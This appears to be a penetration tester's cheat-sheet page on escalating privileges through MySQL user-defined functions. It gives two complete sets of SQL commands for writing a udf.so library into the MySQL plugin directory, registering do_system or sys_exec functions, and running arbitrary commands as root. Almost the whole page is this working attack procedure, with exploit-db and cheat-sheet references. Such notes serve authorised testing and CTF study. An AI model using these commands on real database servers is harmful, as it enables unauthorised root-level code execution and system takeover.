kashz-jewels

mysql exploit

MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit

Requirements

Mysql running as root
Insecure handling of files
Plugin directory knowledge

.so file download

Download from github:metasploit-framework

Method 1 (access to box):

mysql -uroot -p<PASS>
> USE mysql;
> CREATE table kashz(line blob);
> INSERT INTO kashz VALUES(load_file('/PATH/udf.so'));
> SELECT * FROM kashz INTO dumpfile '/PLUGIN-DIR/udf.so';

# create function 
> CREATE FUNCTION do_system RETURNS integer soname 'udf.so';
> SELECT * from mysql.func;

# run RCE
> SELECT do_system('RCE');

Method 2 (no access no box):

Generate shellcode: xxd -p udf.so | tr -d '\n' > udf.so.hex

> SELECT @@plugin_dir;
> SET @shell = 0x<SHELLCODE-DATA>;
> SELECT binary @shell into dumpfile 'PLUGIN-DIR/udf.so';

# create function
> CREATE FUNCTION sys_exec RETURNS int soname 'udf.so';
> SELECT * FROM mysql.func;

# run RCE
> SELECT sys_exec('RCE');

References

https://www.exploit-db.com/exploits/1518
https://github.sofianehamlaoui.fr/Security-Cheatsheets/databases/mysql/mysql-root-to-system-root/
https://gist.github.com/p0c/8587757

Previousmsfvenom apk Nextnagios xi

Last updated 2 years ago